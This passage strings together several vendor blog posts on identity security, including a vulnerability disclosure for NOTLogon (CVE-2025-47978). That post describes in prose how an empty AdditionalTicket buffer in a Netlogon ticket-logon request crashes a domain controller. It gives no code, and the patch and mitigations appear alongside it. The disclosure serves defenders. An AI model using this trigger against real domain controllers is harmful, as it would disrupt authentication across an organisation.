a public repo.   An expired SSL certificate triggered a major Microsoft Exchange outage in 2021.   In the SolarWinds attack, over-privileged machine accounts enabled lateral movement and data theft.   The stakes are high. Many reported cloud breaches involve compromised NHIs—often due to exposed API tokens or unmanaged service accounts. As NHIs continue to proliferate, securing and managing them is no longer optional—it’s mission-critical.   Adding to the challenge is fragmentation. IAM tools like Active Directory were designed for humans, not machines. Different environments (e. g. , Kubernetes, CI/CD pipelines, IoT) manage NHIs in isolation, creating silos, inconsistent enforcement, and audit fatigue.   To address these risks, organizations must start treating NHIs as first-class identities with full lifecycle management, strong access controls, and visibility across environments all aligned to Zero Trust principles.   Why Zero Trust is essential for non-human identity security The Zero Trust model, which asserts “never trust, always verify,” is well-suited to the dynamic nature of non-human identities. Unlike old perimeter-based security models, Zero Trust assumes breach by default and validates every access request—whether from a human user or a machine. Most Zero Trust implementations today, however, focus on human-centric measures: multi-factor authentication, single sign-on identity providers like Okta or Azure AD, and endpoint security agents on user devices. Zero Trust applies to non-human identities (NHIs) Non-human identities often bypass these human-focused controls. A service account, for example, might have persistent access to critical systems with no MFA or behavioural analytics monitoring its use. An API key embedded in code can grant access indefinitely without triggering any alerts. These blind spots are exactly what attackers seek to exploit, allowing them to operate undetected using stolen or misused machine credentials.   Roadmap: Operationalizing Zero Trust for non-human identities Securing NHIs under a Zero Trust framework requires a clear operational roadmap. Organizations should approach this systematically, covering everything from visibility to enforcement:  First, gain complete visibility into the machine identity landscape. You can’t protect what you don’t know exists, so inventory all NHIs across cloud and on-premises environments and map out where and how they interact.   Next, establish ownership and governance for machine identities. Every NHI should have a designated owner or team responsible for it. Define lifecycle policies for these identities — for example, automatically deactivate or rotate credentials after a period of inactivity — and enforce those policies consistently.   Modernize authentication for non-humans. Passwords and other static credentials should be phased out in favor of stronger mechanisms. Employ certificate-based or token-based authentication for services and APIs. Embracing standards like SPIFFE (Secure Production Identity Framework For Everyone) can help ensure consistent workload identity management across platforms.   Stages of Zero Trust implementation Integrate monitoring into security operations. Feed machine identity logs and access events into your Security Information and Event Management (SIEM) and User and Entity Behavior Analytics (UEBA) tools. Baseline normal behavior for service accounts and certificates and enable anomaly detection to flag unusual usage patterns in real time.   Finally, automate the machine identity lifecycle. The issuance, rotation, and revocation of credentials should be built into CI/CD pipelines and automated workflows. By integrating identity management into development pipelines, organizations eliminate manual errors and ensure that security keeps up with the speed of deployment. Embedding Zero Trust into machine identity management Protecting NHIs requires embedding Zero Trust principles throughout the machine identity lifecycle. This begins with recognizing machine identities as first-class entities in your IAM program, just like human users. Secure them with strong, cryptographic authentication methods — such as mutual TLS certificates for services, established workload identity standards, or time-limited API tokens — rather than shared passwords or static keys. Zero Trust architecture also means combining certificate-based machine identities with context-aware access decisions. In practice, that could involve checking the context of a request (origin, time, workload type) before granting access, not just the credential. Decentralized identity issuance frameworks, which dynamically issue and validate certificates or tokens for workloads, can help establish trust across distributed and cloud environments on the fly.   To reduce risk, static credentials must be phased out in favor of short-lived, tightly scoped ones. Secrets management systems should issue ephemeral credentials that expire quickly, and secure identity federation can provide temporary access tokens for external or hybrid services when needed. Additionally, enforcing Zero Standing Privileges (ZSP) ensures that NHIs receive access only when necessary and only to the resources required for their task. In other words, machine identities shouldn’t have more privileges than needed, nor should they be left enabled when not in use.   Micro-segmentation is another critical Zero Trust control for NHIs. By enforcing granular network boundaries around workloads and services, it contains potential compromises and prevents attackers from moving laterally to other systems if a single machine identity is breached. The NHI lifecycle Meanwhile, continuous monitoring and behavioural analytics are essential for detecting anomalous NHI activity. Unusual access patterns — for instance, a normally dormant service account suddenly attempting to read large amounts of sensitive data — should trigger automatic responses. Those responses might include revoking the suspicious credentials, isolating the workload, or other real-time countermeasures based on risk signals. Modern Zero Trust solutions support this kind of adaptive, risk-based policy enforcement to ensure that even when machine identities behave unexpectedly, the system can respond immediately to mitigate harm.   Business case: Why non-human identity security matters now Securing non-human identities (NHIs) is no longer just an IT concern; it’s a business-critical priority. With machine identities now vastly outnumbering human users, any gap in managing them can open the door to breaches, data loss, and operational disruption.   How NHI security can strengthen your organization By moving away from long-lived credentials and enforcing continuous verification, companies can sharply reduce attack surfaces and limit the damage of potential intrusions.   But the benefits go far beyond security:  Compliance becomes simpler, with stronger identity governance and reduced audit overhead.   Uptime improves by automating routine tasks like certificate renewal, avoiding costly outages caused by expired credentials.   Innovation accelerates, as unified identity governance eliminates friction across teams, systems, and environments.   In short, getting NHI security right protects the business from risk, boosts operational resilience, and enables faster, safer innovation.   The future of identity security: Unified, continuous, contextual As experts suggest machine identities now outnumber human identities anywhere from 50:1 to 100:1 — and continue to grow exponentially — they are no longer a mere footnote in cybersecurity; they have become the front line. The future of identity security lies in unified platforms that can continuously authenticate and govern every interaction, whether it’s a person logging in or a microservice calling an API. Identity is no longer static; it’s dynamic, contextual, and foundational to security. We are witnessing a paradigm shift. The age of NHIs is here, and with it comes both unprecedented opportunity and new risks. Organizations that elevate machine identities to strategic assets and adopt Zero Trust as their guiding principle won’t just be more secure — they’ll be more agile, more compliant, and better prepared for whatever comes next.   --- - Published: 2025-07-08 - Modified: 2025-07-08 - URL: https://www.silverfort.com/blog/notlogon-how-a-low-privilege-machine-can-dos-your-domain/ Silverfort discovers Active Directory Denial-of-Service (DoS) vulnerability, known as NOTLogon (CVE-2025-47978) Executive summary The Silverfort security research team identified a denial-of-service (DoS) vulnerability in Microsoft's Netlogon protocol, a core component all Windows domain controllers use. The issue, which we refer to as NOTLogon and Microsoft has named the Windows Kerberos Denial of Service vulnerability, allows any domain-joined machine with minimal privileges to send a specially-crafted authentication request that will crash a domain controller and cause a full reboot. This vulnerability does not require elevated privileges—only standard network access and a weak machine account are needed. In typical enterprise environments, any low-privileged user can create such accounts by default. The crash impacts LSASS, the core security process in Windows, and leads to widespread disruption in Active Directory services, including user logins, policy application, and authentication-dependent resources. Microsoft has given it a CVE rating of 6. 5 and issued a fix for CVE-2025-47978 as part of the July 8th, 2025 Patch Tuesday. We strongly recommend immediate deployment of this update across all domain controllers, along with tightening access controls for service and machine accounts. Vulnerability discovery through AI One of the first and most difficult questions a security researcher must consider is where they are most likely to find a vulnerability. Researchers sift through vast amounts of data, code, and documentation, then choose the right places to look deeper. To speed up the process, and test the boundaries of AI, we used LLMs to identify potential flaws by comparing old release notes to new. This approach recently led to the discovery of this zero-day Active Directory Denial of Service vulnerability. How the DoS vulnerability works The Netlogon Remote Protocol (MS-NRPC) is a fundamental part of Windows domain-based networking, used to authenticate users and machines and maintain secure channels between domain members and Domain Controllers (DCs). Given its privileged position and constant network presence, even non-privilege escalation vulnerabilities in Netlogon can be catastrophic. When we think of authentication vulnerabilities, we often imagine attackers escalating privileges, stealing credentials, or executing remote code. But some of the most disruptive threats can be purely destructive—cutting off access, halting services, and disrupting domain-wide operations. In this post, we uncover NOTLogon, a Denial-of-Service (DoS) vulnerability in the Netlogon protocol that can destabilize or disable core Active Directory operations by exploiting flaws in session negotiation and state handling. NETLOGON 101 To appreciate the implications of NOTLogon, we must understand the Netlogon protocol, a fundamental part of Microsoft’s domain-based security architecture. The Netlogon Remote Protocol (MS-NRPC) is a privileged authentication and channel-establishment protocol used by domain-joined computers and Domain Controllers (DCs). Introduced in Windows NT and still actively used today, Netlogon enables remote domain functionalities such as machine account authentication, acting as an authentication broker, facilitating password rotation, and supporting numerous other sensitive operations critical to Active Directory infrastructure. One of the most critical yet often overlooked roles of the Netlogon protocol is its function as an authentication broker within Windows domain environments. While commonly associated with secure channel establishment for machine accounts, Netlogon also acts as an intermediary between the Local Security Authority Subsystem Service (LSASS) and domain controllers for processing user authentication requests. When a user logs in over the network to a remote application, LSASS delegates the authentication to Netlogon if the credentials must be validated against Active Directory. Netlogon then encapsulates the request into a protocol-specific message called NetrLogonSamLogon and forwards it to the appropriate domain controller, handling the negotiation and response transparently. This is known as passthrough authentication. Passthrough authentication example What kind of authentication scenarios does Netlogon support? Netlogon supports a wide range of authentication scenarios through its NETLOGON_LEVEL union, officially known as NETLOGON_LOGON_INFO_CLASS, which defines how user and service credentials are packaged and forwarded. According to the MS-NRPC specification, the supported levels include: NetlogonInteractiveInformation: For interactive logons, where users enter credentials at the workstation (e. g. , via Ctrl+Alt+Del). This level enables challenge/response verification (typically NTLM or Kerberos) sent to the DC. NetlogonNetworkInformation: For network logons, such as accessing SMB or RPC resources after an interactive logon. Credentials (like NTLM tokens) are transparently re-sent without prompting the user. NetlogonServiceInformation: For service account logons, used when Windows services authenticate with domain credentials to access resources. Transitive Levels (Interactive, Network, Service): Variants of the above enabling cross-domain or trust-bound authentication, where credentials propagate across domains with trust relationships—e. g. , NetlogonInteractiveTransitiveInformation, NetlogonNetworkTransitiveInformation, and NetlogonServiceTransitiveInformation. NetlogonGenericInformation: For generic pass-through authentication, including NTLM, Digest, and Kerberos PAC validation, where a server accepts user credentials and relays them to a DC for validation. How is Netlogon evolving? With NTLM officially deprecated, Microsoft unveiled the Network Ticket Logon specification on July 29th, 2024, and finalized it in an MS-NRPC update released November 19th, 2024. This enhancement allows services to present pre-issued Kerberos tickets to a domain controller using the NetrLogonSamLogonEx RPC—eliminating the need for the original client to directly contact the DC. This scenario supports future capabilities like LocalKDC, where ticket validation can occur offline or through intermediaries. Since it introduces new logic for ticket parsing, PAC verification, and delegated trust handling within a privileged RPC path, we began analyzing the Network Ticket Logon mechanism to assess its security boundaries and potential for misuse. Our journey into the new Network Ticket Logon scenario began with its delivery mechanism: the NetrLogonSamLogonEx RPC call. Microsoft originally introduced this call to generalize logon flows, but as of July 2024, it now supports an entirely new authentication path by accepting the NETLOGON_TICKET_LOGON_INFO structure. This is the heart of the Network Ticket Logon scenario—enabling services to submit Kerberos tickets to a domain controller for validation, without requiring the original client to directly interact with the DC. We turned our attention to the specification for NETLOGON_TICKET_LOGON_INFO, and immediately encountered complexity and ambiguity. Two fields in particular drew our focus: ServiceTicket and AdditionalTicket, both declared as PUCHAR buffers (a pointer type used in Windows API programming to represent a raw byte array—essentially an address pointing to an unsigned char buffer of arbitrary length). The role of ServiceTicket was clearly defined as “a pointer to an unsigned character array containing the service ticket. ” Simple enough. NETLOGON_TICKET_LOGON_INFO structure from MS-NRPC RFC But AdditionalTicket was far more ambiguous. The spec notes: “If the service ticket is a User2User ticket, then the ticket-granting ticket (TGT) used as the source of the session key must also be provided. ” That raised more questions than it answered. Is this field optional unless the ticket represents a U2U scenario? Is the expected content always a TGT? Could other ticket types be valid? To complicate matters, the accompanying AdditionalTicketLength field is described as “the length of the Kerberos service ticket that is the source of authorization”—a conflicting statement if the buffer is meant to contain a TGT. With limited clarity from the documentation, we shifted to experimentation. We constructed the structure manually and began sending controlled requests to a fully patched domain controller. When dealing with privileged RPCs like Netlogon, implementation often speaks louder than spec. The minimal requirement to perform a NetrLogonSamLogonEx is a machine account registered in the domain, which represents a computer or server. Notably, by default, each user may create up to 10 machine accounts in an Active Directory domain. This means a weak user is enough to bind to the Netlogon interface and perform a Network Ticket Logon to a domain controller. The crash: Where Network ticket logon breaks Once we had a working NETLOGON_TICKET_LOGON_INFO structure, we sent a standard Network Ticket Logon request to the domain controller using NetrLogonSamLogonEx. The request included a valid service ticket, as expected. While the Netlogon call returned STATUS_SUCCESS, the embedded KerberosError field inside the response contained STATUS_INSUFFICIENT_RESOURCES—an unusual and suspicious result for a seemingly valid request. To investigate further, we began fuzzing the structure. Omitting the ServiceTicket entirely returned the expected STATUS_INVALID_PARAMETER. However, when we targeted the AdditionalTicket field and sent it as an empty buffer, we observed a crash on the domain controller. LSASS crash results in a full system failure and triggers a domain controller reboot The crash dump pointed to a function named KdcUnpackAdditionalTgt, responsible for decoding the AdditionalTicket buffer into a Kerberos KERB_TICKET ASN. 1 structure. Critically, the function failed to validate that the input buffer was non-empty and well-formed before attempting the decode. This led to a NULL dereference inside LSASS, the Windows process that governs authentication and security policy enforcement. Since LSASS is a protected process, its crash resulted in a full system failure and triggered a reboot of the domain controller. To understand the minimal requirements for exploitation, we tested whether a valid service ticket was necessary. It wasn’t—the vulnerable code path is reached before the ServiceTicket is evaluated. More importantly, it doesn't require high privileges—just network access and a weak machine account is sufficient to trigger the crash. This forms the core of NOTLogon: a denial-of-service vulnerability introduced by the new Network Ticket Logon scenario. Due to a lack of validation in a newly added buffer handler, a single malformed RPC call can destabilize domain controllers—posing a serious reliability and availability threat in enterprise environments. Creating chaos: Implications and mitigation The implications of NOTLogon are straightforward and severe. With only a valid machine account and a crafted RPC message, an attacker can remotely crash a domain controller—a system responsible for the core functionalities of Active Directory, including authentication, authorization, Group Policy enforcement, and service ticket issuance. Crashing all domain controllers effectively paralyzes the domain, cutting off access to resources, interrupting user logins, and disrupting every component that depends on centralized identity. It doesn't require high privileges—just network access and a weak machine account. In environments with poorly managed credentials or insufficient segmentation between workstations and domain controllers, NOTLogon becomes a low-cost, high-impact vector for operational disruption. We strongly suggest installing the latest Microsoft Patch Tuesday update released on July 8th, 2025, which includes a fix for CVE-2025-47978. Organizations should patch all domain controllers without delay, as the issue resides in the Netlogon service itself. In parallel, administrators should audit and harden machine accounts, restrict network access to domain controllers, and limit and monitor service account access, especially those capable of initiating Netlogon RPC flows. How to create a more secure identity security posture in Active Directory Patching this vulnerability is highly recommended; however, in parallel, teams should audit and harden machine accounts, restrict access to domain controllers, and limit and monitor service account access, especially those capable of initiating Netlogon RPC flows. With Active Directory (AD) as the backbone of most organizations' networks, ensuring its security hygiene to reduce the threat of attackers using it to gain unauthorized access to sensitive data is essential. Silverfort can help you clean up Active Directory and reduce your tech debt in various ways, including: Uncovering hidden admin accounts (aka shadow admins) and misconfigurations that could silently expand your attack surface. Identifying and eliminating risky practices, such as NTLMv1 usage and stale service accounts that go undetected in native tools. Defending against stealthy identity-based attacks, like Kerberoasting and Print Spooler exploits, before they escalate. NOTLogon is a reminder that new protocol features—especially in privileged authentication services—can become attack surfaces overnight. Staying secure isn't only about applying patches—it's about examining the foundational systems we rely on every day. To learn more about how to harden your Active Directory posture, download our guide “5 Ways to Step Up Your AD Hygiene. ” --- - Published: 2025-06-18 - Modified: 2025-06-18 - URL: https://www.silverfort.com/blog/secure-your-ai-agents-with-silverforts-identity-first-innovation/ As organizations hurry to embrace AI and its many benefits, one challenge weighs heavily on CISO and security teams' minds: how do you quickly and effectively secure these new capabilities? Today, Silverfort introduces AI Agent Security, our latest innovation designed to empower CISOs to lead secure AI adoption by treating AI agents as identities—governed, visible, and protected with the same rigor applied to human users. The emerging risk: AI agents left to their own devices  Gone are the days when only the most experimental companies adopted AI. Now, as executives across industries demand AI integration, it’s a business-critical priority. But while productivity soars, so do new risks. One area these risks abound is with the use of AI agents: software programs that perform tasks autonomously or on behalf of a human, often making decisions and taking actions based on context or input data. To perform these tasks, AI agents require a level of access to systems, resources and data—just like human users. And that's where the problem lies. AI agents exist in the grey area between human and non-human identities. They need a different type of protection, because current identity and access management (IAM) solutions simply weren’t built for machines who could make their own decisions. They lack visibility and effective governance capabilities for AI agents, leading to a substantial risk of misuse by threat actors, not to mention potential compliance violations and limited auditability. This creates a visibility and control vacuum. CISOs, developers, identity teams, urgently need solutions that seamlessly connect AI agents' identities and privileges to the human actors behind them to ensure full visibility, compliance, and risk management at the speed of innovation. Yet they are expected to secure a rapidly expanding AI ecosystem using tools that were never designed for it. Against a backdrop where expertise is still emerging, the pressure to move quickly is high, and AI agent behavior is evolving every day, it’s easy to see why the task at hand might feel impossible. Our vision: Securing AI agents starts with treating them as an identity  Luckily, there’s a way forward. Our method for securing AI is built on a simple premise: AI agents must be treated as identities and they should be tied to a person. At the core of this is a new definition of “who is doing the action”: not just a username or token, but the combined identity of the human and the AI agent acting on their behalf.   With this identity-first approach, we can automatically discover, classify and monitor AI agent identities before applying dynamic access policies to each of them and, crucially, tying them to their human initiators. This means we can protect all involved with robust, real-time security controls and prevent attackers from using AI agents in lateral movement. This allows you to put governance and boundaries around autonomous agents and pull humans into the loop when appropriate, while protecting all involved with robust security controls. Even better, our unique identity-first architecture allows for a single, end-to-end view of every AI agent and MCP server in action in your environments while being quick to deploy and implement. This means Silverfort can limit AI agent misuse, privilege escalations, and unauthorized actions in your environments within hours of deployment. In short, Silverfort’s AI Agent Security product:  Discovers, classifies and monitors AI agents based on real-world behavior  Ties every action to a responsible human to ensure accountability  Enforces dynamic, least-privilege access policies tailored to each AI agent’s role  Provides comprehensive auditability, enabling compliance in a shifting regulatory landscape  Empowers organizations to securely adopt AI agents without requiring them to be AI experts  Deploys rapidly to prevent key identity security threats in your environment with minimal effort  It’s the first solution that uses this unique architecture to reimagine identity security specifically for AI, significantly reducing the complexity and time required to safely and compliantly adopt AI technologies. With AI Agent Security, AI adoption is no longer a security compromise, but a secure, scalable strategy. Built for businesses, backed by Silverfort  We’re just getting started. As the landscape evolves, Silverfort will continue to lead the way in pioneering technologies that help security leaders stay ahead of the curve. We're actively inviting Silverfort customers to become design partners and help shape the future of AI identity security. If you’re leading AI adoption and need to secure it fast, we want to work with you. Find out more and get a demo.   --- - Published: 2025-06-13 - Modified: 2025-06-13 - URL: https://www.silverfort.com/blog/silverfort-is-now-the-only-imda-accredited-identity-security-platform-for-cloud-and-on-prem/ With the acquisition of Rezonate’s cloud-native capabilities and the launch of the new cloud NHI security capabilities, Silverfort is now the first and only IMDA-accredited identity security & threat detection platform for both cloud and on-prem environments, all in a single solution with real-time detection and enforcement. This level of unified coverage didn’t exist before. It does now, with Silverfort.   What it Means: Licensed to Protect Singapore’s Organizations  IMDA (Infocomm Media Development Authority) is Singapore’s lead agency driving digital transformation. It invests in digital infrastructure, shapes data security and telecom regulations, and fosters international collaboration. Earning IMDA accreditation is a significant achievement as it signals regulatory trust and opens doors to priority projects with Singapore’s government and major enterprises, along with strong growth and expansion opportunities. Since the program’s inception 10 years ago, accredited companies have collectively raised over 1. 2 billion SGD (approximately 1 billion USD) in new capital.   To earn this accreditation, Silverfort underwent a rigorous evaluation across business, technical, financial, and operational use cases. The key to Silverfort’s success was several standout identity security capabilities: extending MFA protection to previously unprotected assets, securing Non-Human Identities (NHIs) with full visibility, real-time monitoring, and proactive detection and resolution of identity misconfigurations. By unifying visibility, access control, posture management, and real-time threat detection in a single platform, Silverfort delivers comprehensive protection across both human and non-human identities.   This unified approach spans on-prem and cloud environments, enabling organizations to stay ahead of evolving threats without compromising flexibility or user experience.   Why it Matters: The Reality of Ransomware in Singapore  Ransomware in Singapore is a persistent and escalating threat. A survey conducted by the Singapore Cyber Security Agency (CSA) in 2023 found that over 80% of organizations experienced cyber incidents, often repeatedly, with ransomware as the most frequent type of attack. Of those affected, 99% reported major business disruptions, data loss, and reputational damage after being attacked. According to official data, more than 130 cases of ransomware were reported to the CSA in 2022 alone. The real numbers, the CSA believes, could be much higher, as truth be told- not every victim reports being attacked.    This national-level concern has led to the creation of the Counter Ransomware Task Force (CRTF), commissioned to bring together government agencies from diverse fields to combat ransomware. Among its key recommendations: cyber insurance should play a central role in incentivizing stronger cybersecurity, particularly for ransomware defense.    In order to qualify for cyber insurance coverage, or to maintain it, cyber insurance providers now require, and rightfully so, that organizations meet baseline identity security standards. This means:  Maintaining full visibility into human users and NHIs, including privileged accounts  Knowing how those accounts are used, and whether they’re still needed  Enforcing MFA across all admin accounts  Monitoring privileged users and NHIs  Detecting anomalies and misconfigurations such as shadow admins  Providing evidence through dashboards, reports, or alerts showing continuous monitoring and enforcement  Although these requirements seem pretty obvious for anyone who does not want to get ransomwared, they are also very difficult to meet. The first problem is that manually discovering all privileged accounts and NHIs is very challenging. The second problem is that many resources, such as legacy systems, command line access, and file shares, were not built to integrate modern security controls like MFA, or they are too delicate to even try and do something that may alter or break them.   Silverfort is in a unique position to help organizations comply with cyber insurance requirements and prevent malicious access in real time without disruption. Silverfort does this by delivering:  Automatic discovery of all privileged and non-human identities  MFA enforcement on systems that weren’t designed for it, including legacy systems and command-line access  Continuous monitoring to spot misconfigurations like shadow admins or unused privileged accounts  Real-time threat detection of all authentication and access attempts  Organizations using Silverfort’s platform have already reported improvements in their insurance eligibility, securing better coverage and lower premiums due to the comprehensive identity security measures in place. For example:  West Valley School District strengthened the protection of both their user and service accounts, aligning with insurer expectations and reducing their premiums  Optix gained full visibility into their service accounts and implemented access policies that helped close the security gaps highlighted in their insurance renewal process  WBD enhanced their identity security posture across on-prem and cloud systems, enabling them to meet insurer requirements and maintain uninterrupted coverage.   For these exact reasons Silverfort is also trusted by leading global cyber insurers such as AIG, Chubb, Sompo, Howden, and Marsh, as a strategic solution for meeting underwriting requirements and reducing identity threats.   The Path Forward: Silverfort + IMDA  Silverfort is the only identity security & threat detection platform accredited by Singapore’s IMDA, which is a major milestone that reinforces our credibility and commitment to securing highly regulated sectors like finance, energy, and telecom. A standout example is our successful deployment at Singtel, where Silverfort secured all on-prem systems without any operational disruption, demonstrating both the platform’s effectiveness and ease of adoption. This accreditation now applies to a platform that delivers identity security to all human and non-human identities across cloud IdPs, SaaS, and on-prem environments. With real-time visibility, policy enforcement, and threat prevention, including blocking credential access and lateral movement, Silverfort empowers organizations to stay compliant and secure. For Singapore’s public sector and regulated industries, this isn’t just an advantage; it’s a practical path toward sustainable digital transformation and ongoing compliance.    Want to learn more about how Silverfort can help you combat ransomware and comply with cyber insurance in Singapore? Talk to one of our local experts here. --- - Published: 2025-06-05 - Modified: 2025-06-04 - URL: https://www.silverfort.com/blog/fireside-chat-with-president-and-cro-howard-greenfield/ Cybersecurity and identity industry veteran Howard Greenfield joins Silverfort as President & CRO. We’re honored to welcome seasoned identity security go-to-market (GTM) leader Howard Greenfield to the Silverfort team. Bringing decades of experience in both cybersecurity and GTM leadership, Howard is equipped to bring our company to new heights as we deliver the first end-to-end identity security platform to customers. To learn more about Howard’s professional background, read the announcement. Pictured: Hed Kovetz, CEO & Co-founder, and Howard Greenfield, President & CRO  For this blog, we sat down with Howard to learn more about his vision, leadership approach, and what’s ahead for the company, our customers and partners, and overall strategy. What drew you to this role at Silverfort and why?   I was drawn to Silverfort for multiple reasons, several of which are related to the main drivers of success in any business: team, TAM, and timing. The team: we have strong and engaged executives, investors, and employees committed to growing our business while preserving and scaling Silverfort’s unique company culture. The TAM (total addressable market): we have an unbelievably large addressable market that transcends barriers like company size, region, and industry. This leads me to timing: “Identity” is now at the forefront of every cybersecurity team’s priority list, and Silverfort’s approach is distinctive. Our approach to identity is security-first and leverages unique and powerful technology, which complements what’s already in the market to enable our 1,000+ customers to take their identity security initiatives to the next level. Identity teams and security teams now overlap in multiple regards, all trying to figure out quickly how to better address identity security as it becomes a board-level discussion and concern.   Lastly, Silverfort has reached rare levels of success – specifically relating to hypergrowth, strong customer retention and satisfaction, and a winning culture full of people who genuinely care about each other and value collaboration to accomplish shared goals. What is your vision for the company in the next 2-3 years?   Building on my last answer where I mentioned pivotal shifts happening in the identity space, here at Silverfort in order to address key issues associated with identity security we launched new products like Privileged Access Security (PAS) and Non-Human Identity (NHI) Security, which together with our other products create the broadest identity security offering in the market. These additions shifted our company from providing a few main value propositions to an end-to-end platform approach. Now as an identity security platform, we’re focused on being well-versed in not only how our technology works, but how it’s actually implemented and used day-to-day to make our customers’ jobs easier while making their organizations more secure, and providing the insights and trends for customers to make better and faster decisions. It’s the difference between delivering solutions rather than just product features and functionality.   We are going to continue growing the business fast, expanding our customer base and bringing more value to our existing customers. Silverfort has already grown faster than other companies around us thanks to great product-market fit and execution, but I see major opportunities to improve and accelerate even further. Silverfort is well positioned to take the lead in the identity security category and build one of the largest companies in cybersecurity.   Regarding our partner and consulting community, we’re all in – I see an opportunity to expand and grow that ecosystem even more. We’re going to expand our programs and empower partners to be the trusted advisors that identity and security teams rely on to achieve success. Why identity security?    We’re at the forefront of cybersecurity for multiple reasons:  Identity plays an increasingly bigger role in the market space – but between remote work, hybrid and complex environments, growth of interconnectivity, AI and more – getting a handle on the overall state of your organization’s environment is very difficult for most companies. To not only be compliance- and governance-driven, but also to be security-driven, requires looking at all dimensions of identity. No other company besides Silverfort understands every identity spanning from on-prem Microsoft AD all the way through to modern cloud-first architectures – we meet customers where they are and where they plan to be, all at the same time.   Identity security is currently pieced together with point solutions. Some solutions focus only on detection and posture, others on specific elements of enforcement. Some focus just on non-human identities, or only privileged users, or just the cloud. Others offer identity security as a feature that is part of a broader offering, but don’t address it fully or deeply enough. Customers now seek a more unified approach; a platform focused on identity security end-to-end. It’s needed not only for better security, but also for cost reduction and consistent user experience.   AI is coming in hot and fast – we're addressing AI identity security in a very innovative way that will help companies adopt agentic AI without worrying about AI agents accessing the wrong things or doing damage.   In the old days, identity security was just a ‘feature’ in the identity infrastructure. That was a reasonable approach when companies only had a single identity management solution. But now that enterprises manage their identities in various on-prem and cloud environments separately with different vendors, there’s a need for a dedicated security platform that can see and protect all these environments. We’re bringing the security arc over all of it, and there’s now a massive opportunity to shape what true identity security looks like and help our customers thrive.   How would you describe your leadership style, through the lens of being our President and CRO? How does that translate into shaping high-performing GTM teams?   It’s my job to equally satisfy and serve three distinct groups: employees, investors, and customers. Everything we do and deliver needs to have a meaningful impact across all three assemblies. Being that cybersecurity is a highly competitive market, along with the fact that identity is now at the center of modern security strategy, we need to keep raising the bar to deliver winning results to all stakeholders.   To achieve that goal, I want us to be a team and a company that will do anything to win while still having the moral compass to choose the right path. Of course, winning doesn’t come without risk, and we need to find the areas where we’re willing to place bets and execute flawlessly. How do we make that possible? I am a big believer in giving teams lots of runway to build their business with flexibility but at the same time providing overarching pillars as a foundation. I want to ensure teams get the right insights so that individuals can do their jobs effectively while ultimately achieving corporate north stars.   How do you see our relationship with customers evolving under your leadership?   Open, ongoing communication with our customers about their feedback, priorities and the actual value they gain from the platform is key to realizing our vision, driving growth, and shaping the roadmap. I also want to be part of the evolution of customers’ maturity, meaning that we partner with our wider ecosystem (partners, consultants, technology alliances) to provide guidance. We want our customers to trust us to guide them on their entire cybersecurity journey, showing them how there are solutions we partner with that maximize a customer’s chances of achieving security and resilience. Now that Silverfort has evolved from offering specific products into a platform, being in the position to provide a singular GTM vision will empower us to focus on how we solve problems, which will positively impact the way we develop and deliver solutions. Our wider team, including myself, will stay close to customers and partners to keep advancing our platform forward and therefore the entire identity security landscape. How do you plan to foster collaboration between marketing, sales, and customer success?   This is a huge benefit for me in that Silverfort doesn’t need much help in that arena, and I’m just excited to add to the momentum. I recently spent time with our Chief Marketing Officer and Chief Customer Officer, and I saw firsthand how our level of collaboration is solid and only getting stronger. We all agree on what’s universally important as a GTM engine and how we need to incorporate process, enablement, and insights so that we’re all moving in the same direction. I’m looking forward to helping the teams get even more aligned on our shared goals and helping each other be successful. Any message you’d like to share with the team, customers, or partners as you begin this next chapter?   I’m thrilled to keep building and growing together while having fun along the way. Thank you for the opportunity to be part of Silverfort's continued growth and success, the sky is the limit for us and I can’t wait to experience what’s ahead with all of you.   Welcome to Silverfort, Howard With Howard's years of experience and strategy-minded approach, this decision is a benefit to both the Silverfort team and the wider identity security community. Interested in learning more about Howard’s experience and recommendations for the identity security space? Connect on LinkedIn to get the conversation started. --- - Published: 2025-06-05 - Modified: 2025-07-17 - URL: https://www.silverfort.com/blog/what-you-dont-know-about-your-identities-could-be-your-biggest-risk/ Have you ever considered that your biggest security risk might come from an account no one remembers exists? Identity has taken its place as the core security control – connecting users, systems and applications. That shift brings a new growing challenge: most organizations don’t have a clear picture of all the identities in their environment and cannot answer a fundamental question: “Who has access to what, and why? ” This lack of visibility isn’t just a blind spot, it’s a security risk. Without a complete understanding of the identity attack landscape, organizations remain exposed to lateral movement, privilege misuse and access misconfigurations that accumulate quietly over time. In this blog, we’ll explore why visibility into identities and their access is foundational for reducing the risk and what organizations should prioritize to close the identity gap. Where identity visibility breaks down Many organizations struggle to maintain a centralized identity infrastructure. In most cases it ends up siloed across multiple systems. On-prem Active Directory (AD), cloud identity providers, standalone SaaS applications, and custom integrations – each part of the hybrid environment has its own identity model, roles, and permissions. Managing them consistently across environments is a significant challenge. To simplify the user experience and reduce friction, many organizations have implemented federated access and single sign-on (SSO). These approaches allow users to log in once and gain access to multiple systems, regardless of where those systems are hosted – in the cloud or on-prem. From the end user’s perspective, it feels seamless: one identity, one password, many apps. But alongside convenience, there’s a hidden complexity and dangerous side effect. Federated access often ignores the actual access paths and permissions behind each login. What looks unified on the surface is often fragmented in the back end. This fragmentation creates critical blind spots where access is granted but not fully understood, where identities persist without proper visibility, and where entitlements accumulate over time. These access gaps are exactly what attackers exploit to initiate lateral movement and privilege escalation. As environments grow more complex, achieving a unified view of identity becomes much harder and far more critical. Why identity visibility is a must-have for any organization You can’t manage what you can’t see and that includes your identities. Without clear visibility into who has access to what, why they have that access, and how they’re using it, organizations are left making decisions in the dark. It’s not just a security gap – it’s a challenge that impacts governance, compliance and operational efficiency. When identity access data is fragmented, identity security controls become reactive and incident response is slowed by a lack of reliable context. End-to-end real-time identity visibility changes that, and enables security and IAM teams to answer foundational questions: Who are the user accounts in our environment? What resources can they access? Why do they have those permissions – and are they still valid? Are they actively using that access, is it excessive or stale? This depth of clarity isn’t just helpful – it’s essential. It serves as the foundation for a range of critical IAM and security practices. With real-time insights into identities and their entitlements, organizations can confidently enforce principle of least privilege by identifying and removing unnecessary access. Compliance teams can produce evidence-based reports that map users to roles, entitlements, and actual usage. And when an incident occurs, security teams have the full identity context they need to trace activity. What organizations gain from identity visibility Once organizations gain full visibility into their identity landscape, it enables them to shift from reactive security controls enforcement to proactive identity security posture. And it also unlocks several strategic advantages across both security and operations: Access mapping and risk reduction It provides a complete overview of who has access to what, and why. It allows organizations to find excessive, outdated or misaligned entitlements. This is the first step towards enforcing least privilege, reducing exposure of critical resources, and minimizing the identity attack surface. Operational efficiency With enhanced visibility into access and usage patterns, organizations can speed up identity governance processes, including provisioning, deprovisioning, and role modeling. This increases process automation and reduces manual effort that can significantly improve cross-collaboration between IAM and security teams. Audit 